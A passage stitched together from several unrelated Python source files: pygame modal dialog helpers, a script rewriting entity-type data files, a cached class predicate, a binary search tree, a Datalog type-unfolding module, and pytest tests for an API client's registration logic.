        | sendID - identifies the kind of data being sent (typically a string)
        | info - the data itself (any type)
        """
        self.oSceneMgr._send_receive(targetSceneKey, sendID, info)

    def sendAll(self, sendID, info):
        """Push information to every other scene via their receive() methods.

        Parameters:
        | sendID - identifies the kind of data being sent (typically a string)
        | info - the data itself (any type)
        """
        self.oSceneMgr._sendAll_receive(self, sendID, info)  # self identifies the sender

    def respond(self, requestID):
        """Answer a request() issued by another scene.

        Override this if your scene expects to be queried via request().
        Parameters:
        | requestID - identifier of what data to send back to the caller
        """
        raise NotImplementedError

    def receive(self, receiveID, info):
        """Accept information sent by another scene via send()/sendAll().

        Override this if your scene expects to receive information.
        Parameters:
        | receiveID - identifier for the type of information received
        | info - the information sent from another scene
        """
        raise NotImplementedError
#
# Dialog functions
#
DIALOG_BACKGROUND_COLOR = (0, 200, 200)  # default teal background for the text dialogs below
DIALOG_BLACK = (0, 0, 0)  # default color for dialog text and border
def textYesNoDialog(theWindow, theRect, prompt, yesButtonText='Yes',
                    noButtonText='No', backgroundColor=DIALOG_BACKGROUND_COLOR,
                    textColor=DIALOG_BLACK):
    """A function that puts up a text-based two-button modal dialog (typically Yes/No or OK/Cancel)
    It can also be used to put up a single button alert dialog (typically with an OK button)
    Parameters:
    | theWindow - the window to draw in
    | theRect - the rectangle (or tuple) of the dialog box in the application window
    | prompt - prompt (title) string to be displayed in the dialog box
    Optional keyword parameters:
    | yesButtonText - text on the Yes button (defaults to 'Yes')
    | noButtonText - text on the No button (defaults to 'No')
    |                Note: If noButtonText is None, then nothing will be drawn for the No button
    |                This way, you can present an "alert" box with only an 'OK' button
    | backgroundColor - rgb background color for the dialog box (defaults to (0, 200, 200))
    | textColor - rgb color for the prompt text (defaults to black)
    Returns:
    | True - meaning the Yes button was pressed
    | or
    | False - meaning the No button was pressed
    |
    | (With an alert dialog, you can ignore the returned value, as it will always be True.)
    """
    # Unpack the dialog rectangle (works for a pygame.Rect or a plain tuple).
    dialogLeft = theRect[0]
    dialogTop = theRect[1]
    dialogWidth = theRect[2]
    dialogHeight = theRect[3]
    # Border rect is inset by 1 pixel so it draws just inside the background.
    frameRect = pygame.Rect(dialogLeft + 1, dialogTop + 1, dialogWidth - 2, dialogHeight - 2)
    INSET = 30  # inset buttons from the edges of the dialog box
    promptText = pygwidgets.DisplayText(theWindow, (dialogLeft, dialogTop + 30), prompt,
                                        fontSize=24, width=dialogWidth, justified='center', textColor=textColor)
    # Create buttons, fix locations after finding out the size of the button(s)
    showNoButton = not (noButtonText is None)
    if showNoButton:
        noButton = pygwidgets.TextButton(theWindow, (0, 0), noButtonText)
    yesButton = pygwidgets.TextButton(theWindow, (0, 0), yesButtonText)
    # Yes button goes at the bottom right; No button (if any) at the bottom left.
    yesButtonRect = yesButton.getRect()
    yesButtonHeight = yesButtonRect[3]
    yesButtonWidth = yesButtonRect[2]  # get width
    xPos = dialogLeft + dialogWidth - yesButtonWidth - INSET
    buttonsY = dialogTop + dialogHeight - yesButtonHeight - 20
    if showNoButton:
        noButton.setLoc((dialogLeft + INSET, buttonsY))
    yesButton.setLoc((xPos, buttonsY))
    #print('In dialogYesNo')
    #print('theRect is', theRect)
    #print('frameRect is', frameRect)
    # 6 - Loop forever (modal: this function only returns on a button click)
    while True:
        # 7 - Check for and handle events
        for event in pygame.event.get():
            if (event.type == QUIT) or \
               ((event.type == KEYDOWN) and (event.key == K_ESCAPE)):
                pygame.quit()
                sys.exit()
            if showNoButton:
                if noButton.handleEvent(event):
                    return False
            if yesButton.handleEvent(event):
                return True
        # 8 - Do any "per frame" actions
        # 9 - Clear the window area before drawing it again
        pygame.draw.rect(theWindow, backgroundColor, theRect)
        pygame.draw.rect(theWindow, DIALOG_BLACK, frameRect, 1)
        # 10 - Draw the window elements
        promptText.draw()
        if showNoButton:
            noButton.draw()
        yesButton.draw()
        # 11 - Update the window
        pygame.display.update()
        # 12 - Slow things down a bit
        #clock.tick(FRAMES_PER_SECOND) # no need for this
def customYesNoDialog(theWindow, oDialogImage, oPromptText, oYesButton, oNoButton):
    """Display a modal two-button dialog built from custom pygwidgets pieces.

    Typically used for Yes/No or OK/Cancel questions; pass None for
    oNoButton to get a single-button alert box (e.g. just 'OK').
    Parameters:
    | theWindow - the window to draw in
    | oDialogImage - an Image object (from pygwidgets) for the dialog background
    | oPromptText - a TextDisplay object (from pygwidgets) containing the prompt
    | oYesButton - a CustomButton object (from pygwidgets) representing Yes or OK, etc.
    | oNoButton - a CustomButton object (from pygwidgets) representing No or Cancel, etc.
    |             (or None for an alert dialog with no No button)
    Returns:
    | True - the Yes button was pressed
    | False - the No button was pressed
    | (With an alert dialog the returned value is always True.)
    """
    hasNoButton = oNoButton is not None
    # Modal loop: only a button click (or quitting the program) exits.
    while True:
        for event in pygame.event.get():
            wantsToQuit = (event.type == QUIT) or (
                (event.type == KEYDOWN) and (event.key == K_ESCAPE))
            if wantsToQuit:
                pygame.quit()
                sys.exit()
            if hasNoButton and oNoButton.handleEvent(event):
                return False
            if oYesButton.handleEvent(event):
                return True
        # Redraw the dialog every frame: background, prompt, then buttons.
        oDialogImage.draw()
        oPromptText.draw()
        if hasNoButton:
            oNoButton.draw()
        oYesButton.draw()
        pygame.display.update()
def textAnswerDialog(theWindow, theRect, prompt, okButtonText='OK',
                     cancelButtonText='Cancel', backgroundColor=DIALOG_BACKGROUND_COLOR,
                     promptTextColor=DIALOG_BLACK, inputTextColor=DIALOG_BLACK):
    """A function that puts up a text-based two-button answerable modal dialog (typically OK/Cancel)
    Parameters:
    | theWindow - the window to draw in
    | theRect - the rectangle (or tuple) of the dialog box in the application window
    | prompt - prompt (title) string to be displayed in the dialog box
    Optional keyword parameters:
    | okButtonText - text on the OK button (defaults to 'OK')
    | cancelButtonText - text on the Cancel button (defaults to 'Cancel')
    | backgroundColor - rgb background color for the dialog box (defaults to (0, 200, 200))
    | promptTextColor - rgb color of the prompt text (defaults to black)
    | inputTextColor - rgb color of the input text (defaults to black)
    Returns:
    | userAnswer - If user presses OK, returns the text the user typed. Otherwise returns None
    """
    # Unpack the dialog rectangle (works for a pygame.Rect or a plain tuple).
    dialogLeft = theRect[0]
    dialogTop = theRect[1]
    dialogWidth = theRect[2]
    dialogHeight = theRect[3]
    INSET = 30  # inset buttons from the edges of the dialog box
    promptText = pygwidgets.DisplayText(theWindow, (dialogLeft, dialogTop + 30), prompt,
                                        fontSize=24, width=dialogWidth, justified='center',
                                        textColor=promptTextColor)
    # Input field spans the dialog width minus the inset on each side.
    inputWidth = dialogWidth - (2 * INSET)
    inputText = pygwidgets.InputText(theWindow, (dialogLeft + INSET, dialogTop + 80),
                                     width=inputWidth, initialFocus=True, textColor=inputTextColor)
    # OK button goes at the bottom right; Cancel button at the bottom left.
    cancelButton = pygwidgets.TextButton(theWindow, (0, 0), cancelButtonText)
    okButton = pygwidgets.TextButton(theWindow, (0, 0), okButtonText)
    okButtonRect = okButton.getRect()
    okButtonHeight = okButtonRect[3]
    okButtonWidth = okButtonRect[2]  # get width
    xPos = dialogLeft + dialogWidth - okButtonWidth - INSET
    buttonsY = dialogTop + dialogHeight - okButtonHeight - 20
    cancelButton.setLoc((dialogLeft + INSET, buttonsY))
    okButton.setLoc((xPos, buttonsY))
    # 6 - Loop forever (modal: returns only on OK/Enter or Cancel)
    while True:
        # 7 - Check for and handle events
        for event in pygame.event.get():
            if (event.type == QUIT) or \
               ((event.type == KEYDOWN) and (event.key == K_ESCAPE)):
                pygame.quit()
                sys.exit()
            # InputText.handleEvent returning True means Enter/Return was pressed.
            if inputText.handleEvent(event) or okButton.handleEvent(event):
                theAnswer = inputText.getValue()
                return theAnswer
            if cancelButton.handleEvent(event):
                return None
        # 8 - Do any "per frame" actions
        # 9 - Clear the window area before drawing it again
        pygame.draw.rect(theWindow, backgroundColor, theRect)
        # NOTE(review): border drawn on theRect itself here, whereas
        # textYesNoDialog insets its frame by 1 pixel — confirm intended.
        pygame.draw.rect(theWindow, DIALOG_BLACK, theRect, 1)
        # 10 - Draw the window elements
        promptText.draw()
        inputText.draw()
        cancelButton.draw()
        okButton.draw()
        # 11 - Update the window
        pygame.display.update()
        # 12 - Slow things down a bit
        #clock.tick(FRAMES_PER_SECOND) # no need for this
def customAnswerDialog(theWindow, oDialogImage, oPromptText, oAnswerText, oOKButton, oCancelButton):
    """Display a modal question dialog built from custom pygwidgets pieces.

    Parameters:
    | theWindow - the window to draw in
    | oDialogImage - an Image object (from pygwidgets) for the dialog background
    | oPromptText - a TextDisplay object (from pygwidgets) containing the prompt
    | oAnswerText - an InputText object (from pygwidgets) where the user types their answer
    | oOKButton - a CustomButton object (from pygwidgets) representing OK, etc.
    | oCancelButton - a CustomButton object (from pygwidgets) representing Cancel, etc.
    Returns:
    | The typed text if the user presses OK (or Enter); None if Cancel is pressed.
    """
    # Modal loop: only OK/Enter, Cancel, or quitting the program exits.
    while True:
        for event in pygame.event.get():
            wantsToQuit = (event.type == QUIT) or (
                (event.type == KEYDOWN) and (event.key == K_ESCAPE))
            if wantsToQuit:
                pygame.quit()
                sys.exit()
            # InputText.handleEvent returning True means Enter/Return was pressed.
            if oAnswerText.handleEvent(event) or oOKButton.handleEvent(event):
                return oAnswerText.getValue()
            if oCancelButton.handleEvent(event):
                return None
        # Redraw the dialog every frame: background, field, prompt, buttons.
        oDialogImage.draw()
        oAnswerText.draw()
        oPromptText.draw()
        oCancelButton.draw()
        oOKButton.draw()
        pygame.display.update()
|
def combine_type(input_file, output_file):
    """Normalize the entity-type segments of '▁SEP'-delimited lines.

    Each input line is expected to look like:
        <prefix>▁SEP <type> ▁FILL <name>▁SEP ... ▁SEP<suffix>
    For every middle segment, the entity type (the text before '▁FILL')
    has all spaces and '▁' markers stripped, then the line is reassembled
    and written to output_file.

    Parameters:
    | input_file - an open, readable text file (or file-like object)
    | output_file - an open, writable text file (or file-like object)
    """
    for line in input_file:
        segments = line.split("▁SEP")
        if len(segments) == 1:
            # No separator at all: pass the line through unchanged.
            # (The original code re-appended segments[-1], which is the
            # whole line in this case, duplicating it in the output.)
            output_file.write(line)
            continue
        rebuilt = segments[0]
        for segment in segments[1:-1]:
            # maxsplit=1 keeps any later '▁FILL' text inside the name
            # instead of silently dropping it.
            ent_type, name = segment.split("▁FILL", 1)
            ent_type = ent_type.replace(" ", "").replace("▁", "")
            rebuilt = rebuilt + "▁SEP " + ent_type + " ▁FILL" + name
        rebuilt = rebuilt + "▁SEP"
        rebuilt = rebuilt + segments[-1]
        output_file.write(rebuilt)
# Rewrite each data split's text file.  Context managers guarantee the
# files are flushed and closed (the original left all six handles open,
# so the written output could be lost on interpreter teardown).
for split in ("train", "devel", "test"):
    src_path = "data/" + split + "/text"
    dst_path = "data/" + split + "/text_new"
    with open(src_path, "r") as src, open(dst_path, "w") as dst:
        combine_type(src, dst)
|
from . import tools
class ClassIsSomething(object):
    """Per-class cached predicate.

    Wraps a check function and memoizes its outcome per class, on the
    assumption that classes are effectively immutable: whether a class
    exhibits a property (e.g. "is iterable") never changes, so once a
    class has been checked, later calls for objects of the same class
    are cheap set-membership lookups rather than repeated checks.
    """

    def __init__(self, check_method):
        self.check_method = check_method  # predicate applied to an instance
        self._true_set = set()   # classes known to satisfy the predicate
        self._false_set = set()  # classes known not to satisfy it

    def force_true(self, cls):
        """Record cls as satisfying the check, overriding any cached False."""
        self._false_set.discard(cls)
        self._true_set.add(cls)

    def force_false(self, cls):
        """Record cls as failing the check, overriding any cached True."""
        self._true_set.discard(cls)
        self._false_set.add(cls)

    def __call__(self, obj):
        """Return the (possibly cached) check result for obj's class."""
        cls = obj.__class__
        if cls in self._false_set:
            return False
        if cls in self._true_set:
            return True
        # First sighting of this class: run the real check and cache it.
        outcome = self.check_method(obj)
        cache = {True: self._true_set,
                 False: self._false_set}[outcome]
        cache.add(cls)
        return outcome
def _is_iterable_method(obj):
    """True for iterables that are not numpy-style iterables."""
    if not tools.is_iterable(obj):
        return False
    return not tools.is_numpy_iterable(obj)
# Shared cached predicates: "storage iterable" means iterable but not a
# numpy-style iterable; "storage mappable" wraps tools.is_mappable.
is_storage_iterable = ClassIsSomething(_is_iterable_method)
is_storage_mappable = ClassIsSomething(tools.is_mappable)
|
#!/usr/bin/env python
#
# A binary search tree.
class BST:
    """A simple unbalanced binary search tree of unique, orderable keys."""

    class Node:
        """A single tree node holding a key and two child links."""
        def __init__(self, key):
            self.left = None
            self.right = None
            self.key = key

    def __init__(self):
        self.root = None

    def insert(self, key):
        """Insert key; return True if added, False if already present."""
        if not self.root:
            self.root = BST.Node(key)
            return True
        return self.insertInto(key, self.root)

    def insertInto(self, key, node):
        """Recursive helper: insert key into the subtree rooted at node."""
        if key == node.key:
            return False  # duplicate keys are not stored
        if key < node.key:
            if node.left:
                return self.insertInto(key, node.left)
            else:
                node.left = BST.Node(key)
                return True
        else:
            if node.right:
                return self.insertInto(key, node.right)
            else:
                node.right = BST.Node(key)
                return True

    def find(self, key):
        """Return True if key is present in the tree."""
        return self.findIn(key, self.root)

    def findIn(self, key, node):
        """Recursive helper: search for key in the subtree rooted at node."""
        if not node:
            return False
        if key == node.key:
            return True
        # Bug fix: the recursive calls previously passed (node.left, key) /
        # (node.right, key), swapping the parameters of findIn(key, node)
        # and crashing on any lookup that descends below the root.
        if key < node.key:
            return self.findIn(key, node.left)
        else:
            return self.findIn(key, node.right)

    def minKey(self):
        """Return the smallest key, or None if the tree is empty."""
        if not self.root:
            return None
        node = self.root
        while (node.left):
            node = node.left
        return node.key

    def maxKey(self):
        """Return the largest key, or None if the tree is empty."""
        if not self.root:
            return None
        node = self.root
        while (node.right):
            node = node.right
        return node.key

    def depth(self):
        """Return the height of the tree (0 for an empty tree)."""
        return self.depthIn(self.root)

    def depthIn(self, node):
        """Recursive helper: height of the subtree rooted at node."""
        if not node:
            return 0
        leftDepth = self.depthIn(node.left)
        rightDepth = self.depthIn(node.right)
        return max(leftDepth, rightDepth) + 1

    def size(self):
        """Return the number of keys stored in the tree."""
        return self.sizeIn(self.root)

    def sizeIn(self, node):
        """Recursive helper: node count of the subtree rooted at node."""
        if not node:
            return 0
        return 1 + self.sizeIn(node.left) + self.sizeIn(node.right)

    def visitInorder(self, f):
        """Call f(key) for every key, in ascending (in-order) order."""
        self.visitInorderSubtree(f, self.root)

    def visitInorderSubtree(self, f, node):
        """Recursive helper: in-order traversal of the subtree at node."""
        if not node:
            return
        self.visitInorderSubtree(f, node.left)
        f(node.key)
        self.visitInorderSubtree(f, node.right)
def printKey(key):
    # Print one key on the current line (Python 2 trailing-comma print
    # suppresses the newline, so keys come out space-separated).
    print key,
def usage():
    # Print the command-line usage message (Python 2 print statement).
    print "Usage: bst <numkeys>"
if __name__ == "__main__":
    import sys, lfsr
    # Require exactly one argument: the number of keys to insert.
    if len(sys.argv) != 2:
        usage()
        sys.exit(1)
    bst = BST()
    # Pseudo-random key source; note this rebinds the module name 'lfsr'.
    lfsr = lfsr.LFSR()
    # Insert <numkeys> pseudo-random integers, then report tree statistics.
    for i in range(0,int(sys.argv[1])):
        bst.insert(lfsr.randInt())
    print "Size:", bst.size()
    print "Depth:", bst.depth()
    print "Range:", bst.minKey(), "-", bst.maxKey()
    print "Values:",
    bst.visitInorder(printKey)
|
# -*- coding: utf-8 -*-
# Copyright 2018 Orange
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import itertools
import six
from octant.common import ast
class UFType(object):
    """Abstract root of the unfolding-type hierarchy."""

    pass
class UFBot(UFType):
    """Bottom type: corresponds to no information at all.

    All instances compare equal and share a constant hash.
    """

    def __eq__(self, other):
        return isinstance(other, self.__class__)

    def __hash__(self):
        return 1  # constant: every UFBot is interchangeable

    def __repr__(self):
        return "UFBot"
class UFTop(UFType):
    """Top type: any value is possible.

    All instances compare equal and share a constant hash.
    """

    def __eq__(self, other):
        return isinstance(other, self.__class__)

    def __hash__(self):
        return 2  # constant: every UFTop is interchangeable

    def __repr__(self):
        return "UFTop"
class UFGround(UFType):
    """Coerced to be a ground value of parameter at a given position

    .. py:attribute:: pos:

        position of the argument in the table (integer starting at 0)

    .. py:attribute:: table:

        table of the EDB defining the ground term (str)

    .. py:attribute:: occurrence:

        An occurrence list defining in a unique way the instance
        of the ground term in use. (linked list represented as pair or None.
        Elements are pairs of a rule identifier (int) and a position of the
        atom in the body (int))
    """

    def __init__(self, pos, table, occurrence):
        self.pos = pos
        self.table = table
        self.occurrence = occurrence

    def __repr__(self):
        return "UFGround(%s,%d,%s)" % (self.table, self.pos, self.occurrence)

    def __hash__(self):
        return hash((self.pos, self.table, self.occurrence))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return (self.pos == other.pos and self.table == other.table
                and self.occurrence == other.occurrence)
class UFConj(UFType):
    """Conjunction of types.

    Represents a conjunct of constraints on the origin; it is usually
    simplified at some point down to one of the origins.
    """

    def __init__(self, args):
        # args must be a tuple: the members of the conjunct.
        self.args = args

    def __repr__(self):
        return "UFConj%s" % (self.args,)

    def __hash__(self):
        return hash(self.args)

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.args == other.args
class UFDisj(UFType):
    """Disjunction of types.

    The values of the element may come from any of the member origins.
    """

    def __init__(self, args):
        # args must be a tuple: the members of the disjunct.
        self.args = args

    def __repr__(self):
        return "UFDisj%s" % (self.args,)

    def __hash__(self):
        return hash(self.args)

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.args == other.args
class GroundHead(collections.namedtuple("GroundHead", ["table", "rid"])):
    """Identifier for a grounded rule head: a table name plus a rule id."""

    def __str__(self):
        return "{0}_({1})".format(self.table, self.rid)
# Shared canonical instances. Since UFTop/UFBot instances all compare equal,
# these singletons can be used in equality tests and set membership checks.
top = UFTop()
bot = UFBot()
def is_ground(t):
    """Check whether the given type is a ground type.

    :param UFType t: type to check
    :return: True if ground, False otherwise
    :rtype: bool
    """
    return isinstance(t, UFGround)
def is_disj(t):
    """Check whether the given type is a disjunction.

    :param UFType t: type to check
    :return: True if disjunction, False otherwise
    :rtype: bool
    """
    return isinstance(t, UFDisj)
def occurrence(t):
    """Compute the occurrence identifier for a whole type.

    Occurrences should be seen as unique IDs. Disjunctions yield the tuple of
    their members' occurrences; ground types yield their own occurrence;
    everything else has no occurrence.

    :param UFType t: type to analyze
    :return: all the occurrences, or None
    :rtype: tuple
    """
    if is_disj(t):
        return tuple(occurrence(member) for member in t.args)
    if is_ground(t):
        return t.occurrence
    return None
def simplify_to_ground_types(t):
    """Give back a list of simple ground types (or disjunctions of them).

    Bug fix: under Python 3 the UFDisj branch previously returned a lazy
    ``map`` object while every other branch returned a list, so the result
    could not be indexed or iterated twice. All branches now consistently
    return lists (backward compatible, as a list is also iterable).

    :param UFType t: type to simplify
    :return: list of UFGround / UFDisj-of-ground types
    :rtype: list
    """
    if is_ground(t):
        return [t]
    if is_disj(t):
        expand_args = [simplify_to_ground_types(a) for a in t.args]
        return [UFDisj(args) for args in itertools.product(*expand_args)]
    if isinstance(t, UFConj):
        return [g for a in t.args for g in simplify_to_ground_types(a)]
    return []
def contains_mark(occ, mark):
    """Check whether *mark* already appears in the occurrence list *occ*.

    Occurrence lists are linked lists encoded as nested pairs
    ``(mark, rest)`` terminated by ``None``.
    """
    while isinstance(occ, tuple) and len(occ) == 2:
        if occ[0] == mark:
            return True
        occ = occ[1]
    return False
def len_occ(occ):
    """Compute the length of the occurrence pseudo list.

    Pairs are used instead of regular lists because a hashable,
    non-mutable element is needed.
    """
    length = 0
    node = occ
    while isinstance(node, tuple) and len(node) == 2:
        length += 1
        node = node[1]
    return length
def weight_type(t):
    """Weight function for types, usable as a sort/min/max key.

    Smaller is better. Returns a pair for lexicographic ordering: ground
    types first (shorter occurrence chains preferred), then conjunctions and
    disjunctions (fewer members preferred), then everything else.
    """
    if is_ground(t):
        return 0, len_occ(t.occurrence)
    if isinstance(t, (UFDisj, UFConj)):
        return 1, len(t.args)
    return 2, 0
def wrap_type(typ, mark):
    """Record the provenance of a type as coming from a given atom.

    :param typ: the type to wrap
    :param mark: mark to add, usually the pair (rule id, position of the atom
        in the rule body)
    :return: the modified type
    """
    if is_ground(typ):
        # Don't stack the same mark twice on one occurrence chain.
        if contains_mark(typ.occurrence, mark):
            return typ
        return UFGround(typ.pos, typ.table, (mark, typ.occurrence))
    if isinstance(typ, (UFDisj, UFConj)):
        # Wrap each member and rebuild the same connective.
        wrapped = tuple(wrap_type(member, mark) for member in typ.args)
        return type(typ)(wrapped)
    return typ
def head_table(rule):
    """Table name of the head of a rule"""
    # Used as the sort/group key when grouping rules by the table they define.
    return rule.head.table
def reduce_disj(l):
    """Simplify a disjunction built from the types in l.

    Nested disjunctions are flattened first. A singleton collapses to its
    only member, and the presence of Top absorbs everything.
    """
    members = set()
    for elem in l:
        if is_disj(elem):
            members.update(elem.args)
        else:
            members.add(elem)
    if len(members) == 1:
        return members.pop()
    if top in members:
        return top
    return UFDisj(tuple(members))
def reduce_conj(l):
    """Simplify a conjunct built from the types in l.

    Nested conjunctions are flattened first. If at least one ground type is
    present, only the ground types are kept; otherwise only the best member
    (by weight) survives when the conjunct would be trivial.

    :param l: the list of types that could build the conjunct
    :return: a conjunct with more than one type, or the single best type
    :rtype: UFType
    """
    members = set()
    for elem in l:
        if isinstance(elem, UFConj):
            members.update(elem.args)
        else:
            members.add(elem)
    ordered = sorted(members, key=weight_type)
    if len(ordered) > 1 and is_ground(ordered[0]):
        # At least one ground member: keep only the ground ones.
        ordered = tuple(filter(is_ground, ordered))
    if len(ordered) > 1:
        return UFConj(tuple(ordered))
    return ordered[0]
class Origin(object):
    """Origin computes types for unfolding.

    Runs a fixpoint over rule and variable typings: variables are typed from
    the tables constraining them, then table types are recomputed from the
    variable types, until table types stabilize.
    """
    def __init__(self, rules, extensible_tables):
        """Unfolding constructor

        :param rules: A list of rules as AST with unique variables and
            primitive tables with labels solved.
        :param extensible_tables: A mapping from table names to a pair of
            boolean and number specifying if the table is extentional and
            the arity of the table.
        """
        self.rules = rules
        # itertools.groupby (used throughout) requires input sorted by the
        # grouping key.
        self.rules.sort(key=head_table)
        self.tables = {}
        self.grounds = {}
        self.table_types = {}
        self.var_types = {}
        self.populate_tables(extensible_tables)
    def populate_tables(self, extensible_tables):
        """Initialize tables field

        It is a map from table name to their arity and the fact they are
        in the IDB or the EDB
        """
        # EDB (extensional) tables: arity comes from the declared arguments.
        for table, args in six.iteritems(extensible_tables):
            self.tables[table] = (len(args), True)
        # IDB (intentional) tables: arity comes from the head of the first
        # rule defining the table.
        for table, group_rule in itertools.groupby(self.rules, key=head_table):
            self.tables[table] = (len(list(group_rule)[0].head.args), False)
    def get_partially_ground_preds(self):
        """Gives back a map of the ground arguments of a table

        An intentional table is ground at argument i, if in all rules
        defining it, the ith argument in the head is ground.
        :return: a dictionary mapping each table name to the set of argument
            positions (integers) that are ground for this table.
        """
        # For each table, intersect over its rules the sets of head argument
        # positions that are not variables (i.e. already ground terms).
        return {
            table: set.intersection(
                *({i
                   for i, term in enumerate(r.head.args)
                   if not (isinstance(term, ast.Variable))}
                  for r in group_rule))
            for table, group_rule in itertools.groupby(self.rules,
                                                       key=head_table)}
    def initialize_types(self):
        """initialize table_types

        The type is either bottom or Ground: arguments are the position of the
        argument, the name of the table and an empty context.
        """
        ground_info = self.get_partially_ground_preds()
        def initialize_table(tname, is_ext, arity):
            # NOTE(review): is_ext is unused here; extensional tables are
            # already filtered out by the comprehension below.
            grounds = ground_info[tname]
            return [
                UFGround(i, tname, None) if i in grounds else UFBot()
                for i in range(arity)]
        # Only intentional (non-extensible) tables get an initial typing.
        self.table_types = {
            tname: initialize_table(tname, is_ext, arity)
            for (tname, (arity, is_ext)) in six.iteritems(self.tables)
            if not is_ext}
    def get_atom_type(self, atom, i):
        """Computes the type of argument at position i of an atom atom

        :param ast.Atom atom: the atom to type
        :param int i: the position
        :return: a type or None if not typable.
        """
        table = atom.table
        # This is a primitive
        if table not in self.tables:
            return None
        # This is an extensible predicate: ground
        if self.tables[table][1]:
            return UFGround(i, table, None)
        # This is an intentional one: get the previous approximation
        if table in self.table_types:
            typ = self.table_types[table]
            # Guard against an arity mismatch between atom and table typing.
            return typ[i] if i < len(typ) else None
        return None
    def type_variables(self):
        """Builds a variables type from table types.

        Several types may be found for each variables as they are constrained
        by multiple tables.
        var_types is updated with a map from variable full ids to types.
        """
        # Collect one (variable id, wrapped type) constraint per variable
        # occurrence in a rule body; the wrap records (rule id, atom index).
        constraints = [
            (arg.full_id(), wrap_type(typ_arg, (rule.id, j)))
            for rule in self.rules  # iterate over rules
            for (j, atom) in enumerate(rule.body)  # iterate over body atoms
            for (i, arg) in enumerate(atom.args)  # iterate over args
            if isinstance(arg, ast.Variable)  # that are variables
            # This is a let: get the type of the ith argument of table.
            for typ_arg in (self.get_atom_type(atom, i),)
            # discard it if we did not find it.
            if typ_arg is not None
        ]
        # groupby below needs constraints sorted by variable id.
        constraints.sort(key=lambda p: p[0])
        self.var_types = {
            # The true type would be a conjunction. But we do not want to
            # make the type unduly complex and we just keep the "Best"
            # value restriction proposed so far.
            # If we had the size of the constants pools, we could do a better
            # informed choice.
            id: reduce_conj([t for _, t in g])
            for id, g in itertools.groupby(constraints, lambda p: p[0])}
    def type_tables(self):
        """Builds table types from variable types

        Table types are the conjunction of the types found for each rule.
        :returns: next value of table types.
        :rtype: map from string to array of type.
        """
        def type_arg_at(arg, table, i, id):
            # A variable head argument takes its inferred type (Top if none);
            # a constant becomes a ground type attached to the (table, rule).
            if isinstance(arg, ast.Variable):
                return self.var_types.get(arg.full_id(), top)
            real = table if id is None else GroundHead(table, id)
            return UFGround(i, real, None)
        def head_atom_ground(rule):
            # True when every head argument is already a ground term.
            return not any(
                isinstance(arg, ast.Variable) for arg in rule.head.args)
        # For each table, zip the per-rule argument type lists column-wise and
        # reduce each column as a disjunction over the defining rules.
        return {
            table: [
                reduce_disj(set(tlist))
                for tlist in zip(*(
                    [type_arg_at(arg, table, i, id)
                     for i, arg in enumerate(rule.head.args)]
                    for rule in group_rule
                    for id in (None if head_atom_ground(rule) else rule.id,)
                ))]
            for table, group_rule in itertools.groupby(self.rules,
                                                       key=head_table)}
    def type(self):
        """Type a set of rules.

        :returns: a dictionary from variable names to their type.

        Performs a fixpoint. Each iteration type variables then type rule
        heads. Table types are comparable and the fixpoint is achieved when
        table types do not evolve.
        It is the type structure that guarantees convergence.
        """
        # NOTE: this method shadows the builtin name `type` within the class
        # namespace; callers use it as origin.type().
        self.initialize_types()
        while True:
            self.type_variables()
            new_table_types = self.type_tables()
            if (new_table_types == self.table_types):
                break
            self.table_types = new_table_types
        return self.var_types
|
from moto import mock_sts
import pytest
from ..apiMan import ApiMan
from isitfit.cli.click_descendents import IsitfitCliError
@pytest.fixture(scope='function')
def MockRequestsRequest(mocker):
    """Fixture factory: patch requests.request to return a canned response.

    Returns a callable taking the fake response object and yielding an
    ApiMan instance wired against the patched HTTP layer.
    """
    def get_class(response):
        # set up
        def mockreturn(*args, **kwargs):
            return response
        mocker.patch('requests.request', side_effect=mockreturn)
        am = ApiMan(tryAgainIn=2, ctx=None)
        return am
    return get_class
class TestApiManRequest:
    """Tests for ApiMan.register with the low-level requests.request mocked."""
    @mock_sts
    def test_register_failSchemaL1(self, mocker, MockRequestsRequest):
        # since the MockApiManRequest patches the request function
        # and since the request function is
        # An empty JSON payload must fail the level-1 schema validation.
        response_val = {}
        class MockResponse:
            import json
            text = json.dumps(response_val)
        am = MockRequestsRequest(MockResponse)
        # trigger
        with pytest.raises(IsitfitCliError) as e:
            am.register()
    @mock_sts
    def test_register_failErrorGeneral(self, mocker, MockRequestsRequest):
        # A generic 'error' status from the API surfaces as a CLI error.
        response_val = {'isitfitapi_status': {'code': 'error'}}
        class MockResponse:
            import json
            text = json.dumps(response_val)
        am = MockRequestsRequest(MockResponse)
        # trigger
        with pytest.raises(IsitfitCliError) as e:
            am.register()
#---------------------------
@pytest.fixture(scope='function')
def MockApiManRequest(mocker):
    """Fixture factory: patch ApiMan.request (one level above HTTP).

    The patched method returns (response, None), matching the
    (json, dt_now) shape the callers unpack.
    """
    def get_class(response):
        # set up
        def mockreturn(*args, **kwargs):
            return response, None
        mocker.patch('isitfit.apiMan.ApiMan.request', side_effect=mockreturn)
        am = ApiMan(tryAgainIn=2, ctx=None)
        return am
    return get_class
class TestApiManRegister:
    """Tests for ApiMan.register with ApiMan.request itself mocked."""
    @mock_sts
    def test_register_failRegInProg(self, mocker, MockApiManRequest):
        # Server keeps answering "registration in progress"; behavior depends
        # on the retry counters (call_n / tryAgainIn / n_maxCalls).
        response = {
          'isitfitapi_status': {'code': 'Registration in progress', 'description': 'foo'},
          'isitfitapi_body': {}
        }
        am = MockApiManRequest(response)
        am.nsecs_wait = 0  # don't sleep between retries in tests
        # no exception, will not automatically try again
        am.call_n = 0
        am.tryAgainIn = 10
        am.register()
        # still no exception, will automatically try again till failing
        am.call_n = 1
        am.tryAgainIn = 2
        am.n_maxCalls = 5
        with pytest.raises(IsitfitCliError) as e:
            am.register()
        # triggers exception right away
        am.call_n = 2
        am.tryAgainIn = 2
        am.n_maxCalls = 3
        with pytest.raises(IsitfitCliError) as e:
            am.register()
    @mock_sts
    def test_register_failSchemaL2(self, mocker, MockApiManRequest):
        # Status ok but body missing required registration fields: level-2
        # schema validation must fail.
        response = {
          'isitfitapi_status': {'code': 'ok', 'description': 'foo'},
